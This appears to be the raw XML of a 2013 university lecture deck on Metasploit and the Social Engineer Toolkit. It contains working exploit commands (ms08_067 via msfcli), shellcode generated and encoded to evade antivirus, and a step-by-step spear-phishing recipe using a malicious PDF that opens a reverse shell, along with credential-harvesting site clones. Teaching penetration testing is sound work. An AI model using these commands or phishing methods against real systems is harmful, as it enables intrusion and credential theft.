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://www.offensive-security.com/metasploit-unleashed/Metasploit_Architectur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://www.offensive-security.com/metasploit-unleashed/Metasploit_Architectur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offensive-security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://www.offensive-security.com/metasploit-unleashed/Main_Page" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securitytube.net/groups?operation=view&amp;groupId=10" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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u8qgehH3kEQ" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpg"/><Relationship Id="rId6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426" y="3113"/>
            <a:ext cx="9556852" cy="68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" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5310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CIS 4930 / CIS 5930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Offensive Security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Spring 2013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" name="Shape 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171" y="903219"/>
            <a:ext cx="6339657" cy="155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Module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: in general is a piece of software that can be used by the MSF. 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auxiliary modules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an exploit without a payload is an auxiliary module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Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is a component in MSF that waits for incoming connections of some sort.  Commonly used with connect-back ("reverse") exploit modules.</a:t>
            </a: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terminology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35" y="152400"/>
            <a:ext cx="6073530" cy="61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389425" y="6349600"/>
            <a:ext cx="8502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From http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture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 filesystem architecture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Pretty intuitive in layout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data: editable files used by Metasploit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documentation: provides documentation for the framework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external: source code and third-party libraries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lib: the 'meat' of the framework code base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modules: the actual MSF modules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plugins: plugins that can be loaded at run-time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scripts: Meterpreter and other scripts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tools: various useful command-line utilities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 main libraries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MSF::Core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Basic API for the framework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Defines MSF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MSF::Base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Provides a friendlier API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simplifies MSF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Modules and Locations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Primary modules located in Backtrack5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/opt/metasploit/msf3/modules/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User defined modules are stored:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>~/.msf4/modules/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Exploits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Any module that uses payloads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Payloads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stand-alone payload catalogue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Encoders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payload encoders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NOPS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nop sled modules keep payload sizes consistent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Auxiliary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misc modules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also exploits that don't use payloads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Post exploitation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35" y="152400"/>
            <a:ext cx="6073530" cy="61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389425" y="6349600"/>
            <a:ext cx="8502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From http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture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40" name="Shape 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2655750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Metasploit Interfaces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MSFconsole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MSFcli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Armitage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framework interfaces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329" y="1852149"/>
            <a:ext cx="4919470" cy="4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600200"/>
            <a:ext cx="35730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most popular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command line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most flexible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feature-rich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most supported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>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only interface that supports plugins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792" y="1600338"/>
            <a:ext cx="4925808" cy="505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Overview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Metasploit Interfaces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Metasploit Database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Metasploit Utilities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Social Engineer Toolkit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4294967295" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946550" y="3310800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MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM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MMMMMMMMMMM                MMMMMMMMMM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MMMN$                           vMMMM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             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MMMMMMMN       NMMMMMMM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MMMNl  MMMMMMMMMNmmmNMMMMMMMMM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MMMMMMMMMMMMMMMMMMMMMMM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MMMMMMMMMMMMMMMMMMMMMMM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   MMMMMMM   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MMMMM   MMMMMMM   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MMMNM   MMMMMMM   MMMMM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MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM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MMMMR  ?MMNM             MMMMM .dMMMM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MMMMNm `?MMM             MMMM` dMMMMM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MMMMMMN  ?MM             MM?  NMMMMMN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MMMMMMMMNe                 JMMMMMNMMM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MMMMMMMMMMNm,            eMMMMMNMMNMM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MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM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MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM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To access msfconsole's help files, enter help followed by the command you are interested in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help vulns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help connect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help route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help use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To show options for utilities / modules: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show exploits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show payloads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show auxiliary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To search for exploits/modules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search XYZ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To make use of a particular module, issue the 'use' command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use windows/shell_reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the console will navigate to the context of that module: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613850"/>
            <a:ext cx="62769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In the context of a module, you can show its options.  Also 'info' provides more detail...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Set them also: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set LHOST A.B.C.D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set LPORT 6666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613850"/>
            <a:ext cx="62769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Issue the 'back' command to navigate to the previous context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>when in doubt... back is your friend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71613"/>
            <a:ext cx="44481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319588"/>
            <a:ext cx="40481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exploit modules support a 'check' option that attempts to test if the set target is vulnerable.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203525"/>
            <a:ext cx="58197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MSFconsole example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Boom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18675"/>
            <a:ext cx="79248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command line interface for MSF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designed for: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scripting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use with other tools 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can pipe input / output of tools and MSFcli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not as user friendly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Victim setup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screenshot </a:t>
            </a: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69" y="1600338"/>
            <a:ext cx="5039531" cy="464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of help options for a specific exploit (ms08_067_netapi)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using O (captial o) in place of any flag with msfcli will display the options / help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703140"/>
            <a:ext cx="59817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Disclaimer / Notes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This class nor FSU has any affiliation with the Offensive Security Team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http://www.offensive-security.com/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The examples / screenshots are specific to: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Backtrack5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Metasploit Framework version 4.6.0-dev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Social Engineer Toolkit version 4.7.2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i="1" lang="en"/>
              <a:t>And as always, act responsibly, you alone are responsible for how you use this information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have to set 3 options for this exploit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RHOST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RPORT (can be left as the default 445)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SMBPIPE (can also be left as the default)</a:t>
            </a:r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722365"/>
            <a:ext cx="59817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Now determine the available payloads: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P</a:t>
            </a:r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84275"/>
            <a:ext cx="8270239" cy="348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msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp 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    The E at the end tells it to execute.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Working in progress:</a:t>
            </a:r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65400"/>
            <a:ext cx="77057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Successful exploit, shell access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MSFcli example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451190"/>
            <a:ext cx="61817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Fully interactive GUI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designed by Raphael Mudge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point and click pwnage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run from command line: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armitage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Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, scripts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written in Cortana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A language based off of Sleep (which is a language similar to perl, and bash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>recent update supports scripting of 3rd party tools, and communication between bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="4" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>botnets!</a:t>
            </a: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501" y="274638"/>
            <a:ext cx="1511300" cy="17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Its fun to use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won't provide as much functionality as msfconsole or msfcli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>also defaults to 32-bit for payloads/exploits AFAIK -- which is a pain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Armitage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83540"/>
            <a:ext cx="6400799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76" name="Shape 276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database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Metasploit keeps track of everything you have done to the target network with it, in its database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Essential for documenting a pentest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57950"/>
            <a:ext cx="60960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Database has to be configured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built-in support for PostgreSQL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allows for importing/exporting results from/to 3rd party tools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keeps results clean and organized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Not just a tool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An entire framework for automating various tasks for penetration testing / attacking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Allows you to easily build attack vectors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scanners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exploits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payloads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encoders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Metasploit (MSF)?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603" y="4097704"/>
            <a:ext cx="5223197" cy="247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 workspaces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A "default" workspace is always created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Useful to create workspaces as needed, to keep organized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workspace -a test1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switch to the workspace with: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workspace test1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delete with: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workspace -d test1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for help:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>workspace -h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List all hosts in the database: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90800"/>
            <a:ext cx="8345262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List all the ports / services info gathered from known hosts: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77575"/>
            <a:ext cx="60293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database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the log of utilized vulns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and so on...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00675"/>
            <a:ext cx="63627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Scanning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 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19725"/>
            <a:ext cx="63436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Importing from 3rd party tools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db_import /path/to/tool/results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msf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="13C16A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db_import /root/msfu/nmapScan</a:t>
            </a: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0000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Importing 'Nmap XML' data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0000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Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'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0000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Importing host 172.16.194.172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0000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[*]</a:t>
            </a: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Successfully imported /root/msfu/nmapScan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msf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="13C16A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hosts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Hosts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=====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address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments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-------         ---                ----  -------  ---------  -----  -------  ----  --------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172.16.194.172  00:0C:29:D1:62:80        Linux    Ubuntu            server         </a:t>
            </a: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DDDDDD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msf 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loot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hash dumps / creds from Windows or *nix systems are stored in database.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msf &gt; loot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50" y="3129375"/>
            <a:ext cx="44767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Backing up / Exporting the DB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db_export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can either be XML or PWDUMP format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db_export -f xml /root/Exported.xml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8" y="2941050"/>
            <a:ext cx="58388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49" name="Shape 349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858875" y="639998"/>
            <a:ext cx="36564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Utilities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492" y="2213170"/>
            <a:ext cx="6606859" cy="46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5992625" y="5603225"/>
            <a:ext cx="2898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Kinda like this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These are direct interfaces to specific features of the MSF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MSFpayload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can provide/generate shellcode, executables, and much more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MSFencode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for encoding payloads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MSFvenom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nasm_shell.rb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Utilities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970" y="3834944"/>
            <a:ext cx="2732831" cy="273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Open source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written in Ruby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Designed by HD Moore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Maintained by Rapid7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Comes with the Backtrack penetration testing Linux distro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Makes life super easy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hack like the movies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i="1"/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Metasploit details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nasm_shell.rb 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/opt/metasploit/msf3/tools# ./nasm_shell.rb 64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(its location may vary)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Friendly tool for assembling instructions into opcode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32 and 64 bit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 sz="1800"/>
              <a:t>/opt/metasploit/msf3/tools# ./nasm_shell.rb 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 sz="1800"/>
              <a:t>default 32 bit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 sz="1800"/>
              <a:t>/opt/metasploit/msf3/tools# ./nasm_shell.rb 64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 sz="1800"/>
              <a:t>for 64 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440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nasm_shell.rb example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1600200"/>
            <a:ext cx="3957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Great for working with shellcode at the byte-level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5243925"/>
            <a:ext cx="42672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600200"/>
            <a:ext cx="40195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Will generate simple shellcode in many formats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C, Ruby, Javascript, VB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Shellcode notes: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often with nullbytes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often the results of MSFpayload (when unencoded) will also be caught by IDS / AV on a network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msfpayload -h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for help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Payload notes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Singles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self contained and standalone payloads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Can be as simple as running firefox.exe or adding a user account to the target system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Stagers  (noted by a '/' in the payload name)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Setup a network connection between victim &amp; attacker, and are designed for reliability.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common for multiple stagers to be chained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Stages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- payload components downloaded &amp; run by stagers (often provide advanced features)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Vast array of different types of shellcode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can be easily modified / customized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msfpayload -l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Options are set via command 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See each payloads options (with O):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29975"/>
            <a:ext cx="654367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Usage: /opt/metasploit/msf3/msfpayload [&lt;options&gt;] &lt;payload&gt; [var=val] &lt;[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar&gt;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Set the options in command line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Specify at the end which format to print it in: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Raw (raw binary of the shellcode)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 (source)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Perl (source)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PHP (source)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Ruby (source)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exe (PE binary/application)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dll (binary/application)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VBA (macro source)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WAR (.zip archive)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Javascript (source)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 examples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64700"/>
            <a:ext cx="6276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MSFpayload examples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47815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Utility for dealing with bad bytes and null bytes.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input = raw binary (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> output from MSFpayload)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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Null bytes are shellcode-specific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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bad bytes are exploit-specific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Bad characters/bytes are a result of some kind of operation performed on the payload, before the payload gets executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\x0a is a terminator for many network protocols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Sports a number of encoder algorithms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AV / IDS / security companies frequently update their signatures to detect these encoder algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smart attackers write their own!</a:t>
            </a:r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95" y="703085"/>
            <a:ext cx="1313680" cy="17289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4380900" y="4298200"/>
            <a:ext cx="4672800" cy="23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i="1" lang="en" sz="2400"/>
              <a:t>"Metasploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>The Penetration Tester's Guide</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400"/>
              <a:t>"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b="1" i="1" lang="en"/>
              <a:t>worth the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$$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i="1" lang="en" sz="2400"/>
              <a:t>Guide from the Offensive Security Team (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No affiliation with this class or FSU</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.offensive-security.com/metasploit-unleashed/Main_Page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i="1" lang="en" sz="2400"/>
              <a:t>Tutorial videos from securitytube.net:</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="1" lang="en" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.securitytube.net/groups?operation=view&amp;groupId=10</a:t>
            </a:r>
          </a:p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033" y="4313238"/>
            <a:ext cx="4537916" cy="22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457200" y="1600200"/>
            <a:ext cx="22887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List the available encoders with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-3429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accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfencode -l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various platforms supported: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x86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x64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php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sparc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mipsle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sz="1800"/>
              <a:t>ppc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519650"/>
            <a:ext cx="587692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MSFencode</a:t>
            </a:r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MSF's default encoder is shikata_ga_nai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x86/shikata_ga_nai           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Rank: excellent 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Description: Polymorphic XOR Additive Feedback Encoder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Many encoding options are specifically useful for certain circumstances / fileformats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Utility for generating custom shellcode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custom combination of MSFpayload + MSFencode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32 and 64 bit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Multiple architectures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customizable commands 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do things other than pop '/bin/sh'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somewhat friendly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by default generates encoded shellcode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nondeterministic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YMMV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MSFvenom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indent="-3429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accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/exec CMD='/bin/sh' -a x86 -b '\x00' -i 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="91440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-p specifies the payload/vector. Here linux/x64/exec indicates 64bit exec()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="91440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CMD specifies the command to pass to the payload.  In this case it specifies the parameter to pass to exec(). note the quotation marks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="91440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-a specifies the architecture. Here 64bit x86 is passed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-29845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-b specifies the bad characters to TRY to avoid during encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800" u="sng"/>
              <a:t>*This sometimes fails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>).  Will be ignored if not encoded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-29845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-i specifies the number of times to encode (here zero).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indent="-3429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accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/exec CMD='/bin/sh' -a x86 -b '\x00' -i 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="91440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Output: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buf =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"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73"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"\x68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x2f\x62\x69\x6e\x2f\x73\x68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x57\x53\x89\xe1\xcd"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"\x80"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Example use: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accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/exec CMD='/bin/sh' -a x86 -b '\x00' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="91440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</a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Output: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[*] x86/shikata_ga_nai succeeded with size 70 (iteration=1)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[*] x86/shikata_ga_nai succeeded with size 97 (iteration=2)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[*] x86/shikata_ga_nai succeeded with size 124 (iteration=3)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buf =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"\xda\xd1\xd9\x74\x24\xf4\x5d\x31\xc9\xbb\x81\x4c\x7b\x16"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"\xb1\x19\x31\x5d\x18\x83\xc5\x04\x03\x5d\x95\xae\x8e\xad"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"\x20\x6e\x82\x1b\x97\xaf\xbd\xe8\x03\xc4\x63\x20\x82\x95"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"\x8e\xc1\xd1\xd2\x9f\x98\xc9\xd9\x82\x32\xbe\x68\x15\x3d"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"\x0e\xd1\x8c\x24\x46\xfa\xe9\x89\x21\x6b\x05\x2e\xfb\xf6"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"\xf5\xda\xc7\x52\xb1\x1d\xf0\x2e\x94\xfc\xb8\x1d\x06\x18"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"\x0c\xb5\xe7\xd2\x3b\x4b\x4c\x12\xd3\x6d\xed\xd3\x6a\x58"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"\xf1\x39\x87\x77\xad\x1d\x46\xca\x55\x90\xdf\xae\xa5\x7d" +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"\x23\xf9\x6c\x3b\xba\x61\xf5\xd9\x63\xa2\xd3\x69"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MSFvenom example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457200" y="1658990"/>
            <a:ext cx="2313300" cy="48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Here the payload is 32-bit windows shellcode to spawn a shell bound to a tcp port.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No CMD is necessary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-e specifies the shikata_ga_nai encoder, which is quite popular.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MSFvenom example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228725"/>
            <a:ext cx="6276975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1645" cy="57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474" name="Shape 474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5085798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Social Engineer Toolkit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(SET)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Social-Engineer Toolkit (SET)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Developed by the team at Social-Engineer.org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Chris Hadnagy (totally awesome person)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Is the industry standard for any social engineering penetration testing attacks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i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Augments an attacker's ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>schmooze</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with a feature-rich technical arsenal.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Features ways to attack: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human weakness, curiosity, credibility, avarice, habit, &amp; stupidity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terminology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accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack-vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is an avenue for gaining information about or access to a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SET categorizes attacks by attack vector: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web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email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USB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.... like the movies...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OK not so much...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Obligitory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http://www.youtube.com/watch?v=u8qgehH3kEQ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223302"/>
            <a:ext cx="4240033" cy="234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61" y="3321832"/>
            <a:ext cx="4513739" cy="324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9445" y="324525"/>
            <a:ext cx="3267355" cy="240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SET's features let you use in attacks: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emails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spoofed/cloned websites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MITM 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custom malware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custom exploits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custom media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custom QR codes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custom applets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and soooooo much more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configuration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assembly required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Need to turn on what vectors you need in the config file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WEBATTACK_EMAIL=ON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SELF_SIGNED_APPLET=ON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...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Its totally worth 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</a:t>
            </a:r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457200" y="1600200"/>
            <a:ext cx="34581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located in /pentest/exploits/set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on backtrack5 (may vary)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run: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./set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274638"/>
            <a:ext cx="4724400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This attack vector is for specially crafting file-format exploits (i.e. adobe PDF exploits)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To be sent as attachments in emails to the target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Features email support for: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SMTP (anonymous and credentialed)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gmail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sendmail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...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Supports the delivery/crafting of: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standard email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>html-supported email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Real world example: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Say the target company is www.example.com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Attackers register www.examp1e.com, or www.eexample.com, www.exaample.com, www.eaxmple.com, www.exapmle.com, etc...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Then attackers send mass-email to the employees of www.example.com from their www.examp1e.com domain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attach malicious PDF, with a reverse-shell payload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SET can automate ALL of this, even the reverse-shell listener.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except for the domain regisration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set to craft malware for phishing attacks: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72125"/>
            <a:ext cx="44862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Crafting options/vectors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56975"/>
            <a:ext cx="60769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Payload selection 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45713"/>
            <a:ext cx="527685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Payload selection part 2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45713"/>
            <a:ext cx="61245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Spear Phishing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So the malicious PDF has been created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exploits a vulnerability in foxit reader 4.1.1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spawns a shell that connects back to the attacker (192.168.56.102)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IF / When the victim opens it, it looks like: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 life is way cooler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3570700"/>
            <a:ext cx="53340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336274"/>
            <a:ext cx="4017891" cy="223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321800"/>
            <a:ext cx="4093850" cy="30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7419975" cy="6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Meanwhile the attacker's listener looks like:</a:t>
            </a:r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my SET listener crashed, so I went with netcat :P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/gg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55150"/>
            <a:ext cx="61055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 supports a number of web attack vectors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Java applets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Client-side web exploits(browser exploits)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User/Password harvesting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clone website, and harvest login info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redirect traffic to legit site, victim sees nothing wrong if no HTTPS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Tabnapping, MITM, web jacking, etc etc...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Java applet option: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Because its java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Highly effective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Java allows you to sign an applet with any name you choose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Sign it as Apple, Google, Samsung, Twitter...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The SET java applet attack vector provides an applet that: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auto-detects the user's browser type,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delivers a custom payload to the victim's machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Java does not consider this a vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>its a FEATURE!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The Java applet option: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lets you clone other websites, or use a template to house the web attack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will automatically host a web server + website to house the configured applet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goal is to get the attacker to navigate to the site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Social engineering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DNS attacks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When the page loads, the user will be prompted for the java applet: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 Windows XP - IE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74" y="971077"/>
            <a:ext cx="8403176" cy="57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 Windows 7 - Chrome</a:t>
            </a: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8280" cy="517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 mobile?</a:t>
            </a:r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 haven't tested thoroughly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My tests didn't even pop up any consent prompt though :D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 shellcode specific to architecture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ARM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Exynos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Snapdragon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ATOM (x86 based)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Tegra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Qualcom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MT6577+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Apple A6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3818425" y="3515525"/>
            <a:ext cx="1590100" cy="2942250"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="117690" w="63604">
                <a:moveTo>
                  <a:pt x="7788" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44133" y="22067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35047" y="50624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63604" y="59278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38075" y="66633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43700" y="102546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11769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5" name="Shape 605"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5473425" y="4510700"/>
            <a:ext cx="3456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From a security perspective, the current state of processor diversity is a HUGE hurdle for attackers to get into mobile hacking at low levels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Disclaimer</a:t>
            </a:r>
          </a:p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one named Bill Gates had nothing to do with this.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Firewall notes</a:t>
            </a:r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Depending on the payload, this may get caught by a firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
